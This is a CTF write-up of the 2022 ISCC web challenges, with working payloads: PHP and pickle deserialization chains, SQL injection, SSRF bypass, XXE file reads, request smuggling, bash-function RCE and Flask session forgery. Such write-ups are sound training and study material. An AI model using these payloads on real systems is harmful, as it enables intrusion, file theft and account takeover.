2022ISCC-web-wp

Everything except 爱国敬业好青年1 (which had zero solves) is written up here. The writeup is fairly terse; feel free to ask if anything is unclear.

冬奥会

The endpoint takes a JSON string. Its first key must be year, and the value must not be numeric.

if(is_array(@$info["items"])){
    if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
    $status = array_search("skiing", $info["items"]);
    $status===false?die("Sorry~"):NULL;
    foreach($info["items"] as $key=>$val){
      $val==="skiing"?die("Sorry~"):NULL;
    }
    $Step2=True;
  }

The second key is items. array_search() uses loose comparison (==), and in PHP 7 the non-numeric string "skiing" compared with the integer 0 is true, so array_search() matches element 0 while the strict === check in the foreach never sees a literal "skiing". The remaining constraints come straight from the code: exactly three elements, and items[1] must itself be an array, hence a nested (two-dimensional) array. Note that this relies on PHP 7 semantics; in PHP 8, 0 == "skiing" is false and the trick no longer works.

poc

?Information={"year":"a","items":[0,[],"a"]}

爱国敬业好青年2

May 10 is the 100th anniversary of the founding of the Communist Youth League, so the coordinates are guessed to be Tiananmen. Go to the /flag page and POST the longitude and latitude to get the flag.

POST body (URL-encoded; decoded it reads lati=116°23′E&langti=39°54′N, with the parameter names swapped relative to the values, exactly as submitted):

lati=116%C2%B023%E2%80%B2E&langti=39%C2%B054%E2%80%B2N


Pop2022

The sink is include($value) in Try_Work_Hard::append(), reached through __invoke(). A php://filter wrapper reads /flag.php base64-encoded, so the file is output rather than executed. The chain: unserialize() creates the objects and calls Road_is_Long::__wakeup() on the outer object, whose preg_match() receives $page, which is a second Road_is_Long; the object is cast to string, so its __toString() runs and returns $this->string->page. $string is a Make_a_Change with no page property, so __get() fires and calls $this->effort(), a Try_Work_Hard, whose __invoke() calls append() and includes $var. The inner Road_is_Long keeps $page = 'index.php', so its own __wakeup() check passes, and the blacklist only ever inspects $page, never the protected $var. Because $var is protected, the serialized string contains NUL bytes, which is why the POC urlencode()s it.

poc:

<?php
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        //echo 'Road_is_Long__construct';
        $this->page = $file;
    }
    public function __toString(){
        echo '__toString';
        return $this->string->page;
    }
    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}
class Try_Work_Hard{
    protected  $var='php://filter/read=convert.base64-encode/resource=/flag.php';
    public function append($value){
        echo 'append';
        include($value);
    }
    public function __invoke(){
        echo '__invoke';
        $this->append($this->var);
    }
} 
class Make_a_Change{
    public $effort;
    public function __construct(){
        //echo 'Make_a_Change__construct';
        $this->effort = array();
    }
    public function __get($key){
        echo '__get';
        $function = $this->effort;
        return $function();
    }
}
$a=new Road_is_Long();
$b=new Road_is_Long();
$c=new Make_a_Change();
$d=new Try_Work_Hard(); 
$c->effort=$d;
$b->string=$c;
$a->page=$b;
echo urlencode(serialize($a)); 
?>


ISCC{lets_pop_your_2022}

Easy-SQL

?id=-8 union table emails limit 7,1#

This returns the source. TABLE emails is MySQL 8.0.19+ syntax equivalent to SELECT * FROM emails, which makes it usable inside a UNION when the keyword select is filtered.

When a UNION query selects data that does not exist in the table, it fabricates a virtual row, so the login check compares the POSTed password against values we control: 0x61646d696e is the MySQL hex literal for 'admin', and the third column is set to 3 to match passwd=3.

username=0’ union select 1,0x61646d696e,3#&passwd=3
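The virtual-row trick above, as an added example that is not part of the original writeup. It uses an in-memory SQLite table (constructed; the challenge's schema is not shown) and spells the payload the SQLite way: a `--` comment instead of MySQL's `#`, and a quoted 'admin' where MySQL accepts the hex literal 0x61646d696e. The hardened variant binds the username as a parameter.

```python
import sqlite3


def make_db():
    """Constructed demo table; the real challenge's schema is not shown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "S3cret!"), (2, "guest", "guest")])
    return conn


def login_vulnerable(conn, username, passwd):
    """Login the way the challenge appears to implement it: the username is spliced
    into the query, then the password column of whatever row comes back is compared
    with the POSTed password. A UNION row supplies both the username and the password."""
    sql = "SELECT id, username, password FROM users WHERE username = '%s'" % username
    row = conn.execute(sql).fetchone()
    if row is not None and row[2] == passwd:
        return row[1]
    return None


def login_safe(conn, username, passwd):
    """Same logic with a bound parameter: the injected text is just a username nobody has."""
    sql = "SELECT id, username, password FROM users WHERE username = ?"
    row = conn.execute(sql, (username,)).fetchone()
    if row is not None and row[2] == passwd:
        return row[1]
    return None


# SQLite spelling of the challenge payload username=0' union select 1,0x61646d696e,3#
UNION_USERNAME = "0' UNION SELECT 1, 'admin', '3' -- "
UNION_PASSWD = "3"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, UNION_USERNAME, UNION_PASSWD))  # logged in as admin
    print(login_safe(db, UNION_USERNAME, UNION_PASSWD))        # None
```

The first query returns the row (1, 'admin', '3') that the UNION fabricated, so the "password" it checks is the one the attacker chose.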

findme

A simple exploitation of PHP built-in classes.

http://59.110.159.206:8030/unser.php

First use the php://filter wrapper to read hint.php, which reveals roughly where the flag is:

<?php
class a{
    public $un0;
    public $un1;
    public $un2="php://filter/convert.base64-encode/resource=";
    public $un3;
    public $un4;
}
$payload=new a();
echo serialize($payload);

POC that gets the flag file directly: un0 names the built-in class DirectoryIterator and un1 is its constructor argument, a glob:// path that lists every /var/www/html/f*.txt (the server-side unser.php is not reproduced here, so the meaning of un3 and un4 is taken from what worked):

<?php
class a{
    public $un0="DirectoryIterator";
    public $un1="glob:///var/www/html/f*.txt";
    public $un2;
    public $un3="unserialize";
    public $un4="abc";
}
$a=new a();
echo serialize($a);

让我康康!

There is a search box and a hint to visit the fl4g page. Visiting it returns 403. Trying to reach fl4g through HTTP request smuggling instead produces a message that the request must come from localhost.


Combined with the search box, we find that the request as rewritten by the front end is reflected in the response. Sending it as a POST with a Content-Type header, the smuggled request reveals the name of the header the front-end server uses to pass the client IP to the back end, and with that header we can pose as a local user.


This yields the flag.


This one is a code audit challenge.

Requesting index with url=1 produces an error page; view its source.


Visiting the file it names shows emoji-encoded source.


Decoding it gives the source:

# The imports, the Flask app object and control_key's initial value are not in the
# snippet as recovered; they are added here so it parses.
import base64
import re
import socket
import struct
from urllib.parse import urlparse
from flask import Flask, render_template

app = Flask(__name__)
control_key = 0

def geneSign():
    if(control_key==1):
        return render_template("index.html")
    else:
        return "You have not access to this page!"
def check_ssrf(url):
    hostname = urlparse(url).hostname
    try:
        if not re.match(r'https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if not re.match(r'https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
                raise BaseException("url format error")
        if  re.match(r'https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+', url):
            if judge_ip(hostname):
                return True
            return False, "You not get the right clue!"
        else:
            # the plain-host branch resolves the name but never returns True
            ip_address = socket.getaddrinfo(hostname,'http')[0][4][0]
            if is_inner_ipaddress(ip_address):
                return False,"inner ip address attack"
            else:
                return False, "You not get the right clue!"
    except BaseException as e:
        return False, str(e)
    except:
        return False, "unknow error"
def ip2long(ip_addr):
    return struct.unpack("!L", socket.inet_aton(ip_addr))[0]
def is_inner_ipaddress(ip):
    ip = ip2long(ip)
    print(ip)
    return ip2long('127.0.0.0') >> 24 == ip >> 24 or ip2long('10.0.0.0') >> 24 == ip >> 24 or ip2long('172.16.0.0') >> 20 == ip >> 20 or ip2long('192.168.0.0') >> 16 == ip >> 16 or ip2long('0.0.0.0') >> 24 == ip >> 24
def waf1(ip):
    # character blacklist: any literal 127.0.0.1 (or any dotted address) is rejected
    forbidden_list = [ '.', '0', '1', '2', '7']
    for word in forbidden_list:
        if ip and word:
            if word in ip.lower():
                return True
    return False
def judge_ip(ip):
    if(waf1(ip)):
        return False   # recovered source has the typo "Fasle"; the NameError it raised was swallowed by check_ssrf's except
    else:
        # addr is not defined anywhere in the recovered snippet; the payload that
        # worked implies it is "127.0.0.1"
        addr = addr.encode(encoding = "utf-8")
        ipp = base64.encodebytes(addr)   # original called base64.encodestring, removed in Python 3.9
        ipp = ipp.strip().lower().decode()
        if(ip==ipp):
            global control_key
            control_key = 1
            return True
        else:
            return False

Send http://59.110.159.206:8040/index?url=https://@MTI3LjAuMC4x

Why this works: the plain https://host branch can never succeed (both of its outcomes return False), so the only route to control_key = 1 is the https://@host form, where judge_ip() receives urlparse(url).hostname. waf1() blacklists the characters . 0 1 2 7, which kills any literal 127.0.0.1, but judge_ip() then compares the hostname with base64(addr) lower-cased. base64("127.0.0.1") is MTI3LjAuMC4x; urlparse() lower-cases the hostname to mti3ljaumc4x, which contains none of the forbidden characters and equals the lower-cased encoding.

This bypasses the SSRF restriction and yields a new hint.
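The decision logic of check_ssrf() replayed offline, as an added example that is not part of the original writeup or the challenge source. It keeps the regexes, waf1() and judge_ip() as recovered, drops the socket.getaddrinfo() branch (which can never return True anyway), normalises the result to a (allowed, message) tuple, and assumes the undefined `addr` is "127.0.0.1", which is what the working payload implies but which the page never states.

```python
import base64
import re
from urllib.parse import urlparse

# Assumption: the `addr` that the recovered source never defines is "127.0.0.1".
ADDR = "127.0.0.1"

PLAIN_FORM = re.compile(r"https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+")
AT_FORM = re.compile(r"https?://@(?:[-\w.]|(?:%[\da-fA-F]{2}))+")
FORBIDDEN = [".", "0", "1", "2", "7"]


def waf1(host):
    """Same character blacklist as the challenge: any dotted-quad form of 127.0.0.1 dies here."""
    return any(word in host.lower() for word in FORBIDDEN)


def judge_ip(host):
    """host must equal base64(addr) lower-cased; urlparse() already lower-cases hostnames."""
    if waf1(host):
        return False
    expected = base64.b64encode(ADDR.encode()).strip().lower().decode()
    return host == expected


def check_ssrf_offline(url):
    """check_ssrf() minus the DNS branch, so it runs without network access.
    Returns (allowed, message); the original returns a bare True on success."""
    if not PLAIN_FORM.match(url) and not AT_FORM.match(url):
        return False, "url format error"
    if AT_FORM.match(url):
        if judge_ip(urlparse(url).hostname):
            return True, "control_key = 1"
        return False, "You not get the right clue!"
    return False, "plain-host branch: the original resolves the name here and never returns True"


def build_payload(addr):
    """The '@' form has an empty userinfo, so the base64 text becomes the hostname."""
    return "https://@" + base64.b64encode(addr.encode()).decode()


if __name__ == "__main__":
    url = build_payload(ADDR)
    print(url, urlparse(url).hostname, check_ssrf_offline(url))
```

The same routine shows why the obvious attempts fail: https://@127.0.0.1 is rejected by waf1(), and https://127.0.0.1 never reaches judge_ip() at all.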


Visit that directory and, in the intercepted request, replace the cookie with the one the challenge gives.


This lands on a login page; viewing its source gives a piece of JavaScript.


It clearly wants us to POST an XML body, and the parser is vulnerable to XXE. The request:

POST /mti3ljaumc4x/codelogin HTTP/1.1
Host: 59.110.159.206:8040
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: td_cookie=2450783275;login=1; a_cookie=aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ==
Upgrade-Insecure-Requests: 1
Content-Type: application/xml;charset=utf-8
Content-Length: 172

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY name SYSTEM "file:///etc/passwd">
  ]>
<user><name>&name;</name><password>admin</password></user>

The file is read successfully.


Following the hint, use /proc: /proc/self/cwd/ is the working directory of the process that parses our XML, so pointing the entity at it reveals that directory and the files in it.

Reading /proc/self/cwd/flag.txt gives the flag.


ping2rce

Environment-variable RCE; see p牛's article at https://tttang.com/archive/1450/. The form field name reaches the environment of the CGI script, and bash imports any variable named BASH_FUNC_<name>%% whose value begins with "() {" as a shell function, so a function named ping shadows the ping binary the script invokes. Sending the POC below is enough for command execution.


POST /cgi-bin/ping?ip=127.0.0.1 HTTP/1.1
Host: 59.110.159.206:8010
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 152
Content-Type: multipart/form-data; boundary=cf7fc1d68a5861b16bd95126c45ba379

--cf7fc1d68a5861b16bd95126c45ba379
Content-Disposition: form-data; name="BASH_FUNC_ping%%"
() { cat /flag; }
--cf7fc1d68a5861b16bd95126c45ba379--
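What the exported function does once it reaches the target's environment, as an added example that is not part of the original writeup. It starts a local bash with the variable BASH_FUNC_ping%% set (the name bash 4.4+ uses for exported functions) and runs a script that calls ping; the body is "() { echo pwned; }" here instead of the "() { cat /flag; }" used against the target. It assumes a bash 4.4 or newer on PATH and returns None otherwise.

```python
import shutil
import subprocess

# bash >= 4.4 imports an environment variable named BASH_FUNC_<name>%% whose value
# starts with "() {" as a function called <name>; this is what the form field exploits.
FUNC_NAME = "BASH_FUNC_ping%%"
FUNC_BODY = "() { echo pwned; }"      # against the target: "() { cat /flag; }"


def _bash_version(bash):
    """Return (major, minor) of the given bash, or None if it cannot be determined."""
    out = subprocess.run([bash, "-c", 'echo "${BASH_VERSINFO[0]}.${BASH_VERSINFO[1]}"'],
                         capture_output=True, text=True).stdout.strip()
    try:
        major, minor = out.split(".")
        return int(major), int(minor)
    except ValueError:
        return None


def run_with_injected_function(script="ping -c 1 127.0.0.1", env_name=FUNC_NAME, body=FUNC_BODY):
    """Run `script` under bash with the function exported through the environment.
    Returns the script's stdout, or None when no bash >= 4.4 is available."""
    bash = shutil.which("bash")
    if bash is None:
        return None
    version = _bash_version(bash)
    if version is None or version < (4, 4):
        return None   # older releases use a different variable name for exported functions
    env = {"PATH": "/usr/local/bin:/usr/bin:/bin", env_name: body}
    proc = subprocess.run([bash, "-c", script], env=env, capture_output=True, text=True)
    return proc.stdout.strip()


if __name__ == "__main__":
    print(run_with_injected_function())   # "pwned" on bash >= 4.4: the ping binary is never run
```

The CGI script itself is untouched; the only thing the attacker controls is an environment variable name and value, which is exactly what a multipart field name and body provide.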


Melody

Log in as any user first; the site uses a session cookie.


eyJ1c2VybmFtZSI6ImFkbWluMSJ9.Ym89BA.cTzCdduJBZkB49voYggktxppsnI

A hint says the /info page must be visited with the Melody browser; setting the User-Agent header to Melody is enough.

There is a Jinja2 template injection. Dumping the config reveals the secret_key, so the next step is simply to forge the session.


Key obtained: meldoy-is-so-cute-wawawa!


Then forge the Flask session with a script, swap in the new cookie, and the login succeeds.
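The forgery step spelled out, as an added example that is not part of the original writeup. It reimplements Flask's default session cookie format (itsdangerous URLSafeTimedSerializer with salt "cookie-session", key derivation "hmac" and HMAC-SHA1) from the standard library only, so it can decode the unsigned payload of the cookie captured above, recover its timestamp, and mint a username=admin cookie under the leaked key. Plain JSON values only; Flask's tagged JSON for non-JSON types is not reproduced.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

# Flask's SecureCookieSessionInterface defaults: salt "cookie-session", the signing key
# is HMAC-SHA1(secret_key, salt), and the signature is HMAC-SHA1(signing key, payload.ts).
SALT = b"cookie-session"


def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(text):
    return base64.urlsafe_b64decode(text + b"=" * (-len(text) % 4))


def _signing_key(secret_key):
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def decode_session(cookie):
    """The payload is only base64 (optionally zlib, marked by a leading '.'): readable without the key."""
    raw = cookie.encode()
    compressed = raw.startswith(b".")
    if compressed:
        raw = raw[1:]
    payload = _b64d(raw.split(b".", 1)[0])
    if compressed:
        payload = zlib.decompress(payload)
    return json.loads(payload)


def session_timestamp(cookie):
    """Second-to-last segment: the issue time as a big-endian integer, base64 encoded."""
    return int.from_bytes(_b64d(cookie.encode().split(b".")[-2]), "big")


def forge_session(secret_key, data, timestamp=None):
    """Build a cookie Flask will accept for `data` under `secret_key`."""
    payload = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = b"." + _b64e(compressed)
    else:
        body = _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = body + b"." + _b64e(ts_bytes)
    sig = hmac.new(_signing_key(secret_key), value, hashlib.sha1).digest()
    return (value + b"." + _b64e(sig)).decode()


def verify_session(secret_key, cookie):
    """Return the session data if the signature matches, else None (what the server does)."""
    value, _, sig = cookie.encode().rpartition(b".")
    expected = hmac.new(_signing_key(secret_key), value, hashlib.sha1).digest()
    if not hmac.compare_digest(expected, _b64d(sig)):
        return None
    return decode_session(cookie)


CAPTURED = "eyJ1c2VybmFtZSI6ImFkbWluMSJ9.Ym89BA.cTzCdduJBZkB49voYggktxppsnI"
LEAKED_KEY = "meldoy-is-so-cute-wawawa!"

if __name__ == "__main__":
    print(decode_session(CAPTURED), session_timestamp(CAPTURED))
    print(forge_session(LEAKED_KEY, {"username": "admin"}))
```

The timestamp of the captured cookie decodes to 2022-05-02 10:08 CST, matching when it was taken; the server only checks the timestamp against its lifetime, so a forged cookie can reuse any recent value.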


That flag is a fake. A .py source file turns up; download it.


The code:

# -*- coding:utf-8 -*-
# The io/sys imports, the Flask app object, the session import and the read() helper
# are not in the file as downloaded; they are added here so the snippet parses.
import io
import pickle
import sys
import melody
import base64
from flask import Flask, Response, request, session
app = Flask(__name__)

def read(path):
    with open(path) as f:
        return f.read()

class register:
    def __init__(self,name,password):
        self.name = name
        self.password = password
    def __eq__(self, other):
        return type(other) is register and self.name == other.name and self.password == other.password
class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # only a prefix check: anything reachable under __main__ is allowed
        if module[0:8] == '__main__':
            return getattr(sys.modules['__main__'],name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
def find(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()
@app.route('/therealflag', methods=['GET','POST'])
def realflag():
    if request.method == 'POST':
        try:
            data = request.form.get('melody')
            if b'R' in base64.b64decode(data):   # blocks only the REDUCE opcode
                return 'no reduce'
            else:
                result = find(base64.b64decode(data))
                if type(result) is not register:
                    return 'The type is not correct!'
            correct = ((result == register(melody.name,melody.password))&(result == register("melody","hug")))
            if correct:
                if session['username'] == 'admin':
                    return Response(read('./flag.txt'))
                else:
                    return Response("You're not admin!")
        except Exception as e:
            return Response(str(e))
    test = register('admin', '123456')
    data = base64.b64encode(pickle.dumps(test)).decode()
    return Response(data)

Pickle deserialization. The filter only rejects the R (REDUCE) opcode, and find_class() allows any name under __main__, so the payload (written with pker) uses c (GLOBAL) to fetch the melody module, a dict followed by b (BUILD) to overwrite its attributes so they match the hard-coded "melody"/"hug", and o (OBJ) to instantiate register with those values. No R is needed anywhere:

import base64
payload=b"c__main__\nmelody\n(S'name'\nS'melody'\nS'hug'\nS'2'\ndb0(c__main__\nregister\nS'melody'\nS'hug'\no."
print(base64.b64encode(payload))
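The same BUILD/OBJ technique run end to end, as an added example that is not part of the original writeup. It reproduces the challenge's RestrictedUnpickler and the b'R' check, but resolves __main__ names from a dictionary instead of sys.modules['__main__'] (so it runs under any harness) and stands in for the melody module with a SimpleNamespace whose initial name/password are assumed values, since the real module's are unknown. The payload is hand-written protocol-0 opcodes and, unlike the one above, also sets password.

```python
import io
import pickle
import types


class register:
    def __init__(self, name, password):
        self.name = name
        self.password = password

    def __eq__(self, other):
        return type(other) is register and self.name == other.name and self.password == other.password


# Stand-in for the `melody` module; assumed initial values (the real ones are unknown).
melody = types.SimpleNamespace(name="admin", password="123456")

# Plays the role of sys.modules['__main__'] in the challenge's find_class().
MAIN = {"melody": melody, "register": register}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module[0:8] == "__main__":
            return MAIN[name]          # getattr(sys.modules['__main__'], name) in the original
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def find(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()


# Protocol-0 opcodes; no REDUCE ('R') anywhere, so the server's filter lets it through.
PAYLOAD = (
    b"c__main__\nmelody\n"             # GLOBAL: push the melody module
    b"(S'name'\nS'melody'\n"           # MARK, then key/value pairs ...
    b"S'password'\nS'hug'\nd"          # DICT: {'name': 'melody', 'password': 'hug'}
    b"b"                               # BUILD: melody.__dict__.update(that dict)
    b"0"                               # POP: drop the module from the stack
    b"(c__main__\nregister\n"          # MARK, push the register class
    b"S'melody'\nS'hug'\no"            # OBJ: register('melody', 'hug')
    b"."                               # STOP: the register instance is the result
)


def exploit(payload=PAYLOAD):
    """Mirror /therealflag: reject 'R', unpickle, then run both equality checks."""
    if b"R" in payload:
        return "no reduce"
    result = find(payload)
    if type(result) is not register:
        return "The type is not correct!"
    return (result == register(melody.name, melody.password)) & (result == register("melody", "hug"))


if __name__ == "__main__":
    print(exploit())                    # True
    print(melody.name, melody.password)  # melody hug: the module's attributes were overwritten
```

The lesson for the defender is that an opcode blacklist is not a sandbox: BUILD writes to any object's __dict__ and OBJ calls any allowed class, so find_class() has to allow an explicit, minimal set of names rather than a whole module.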
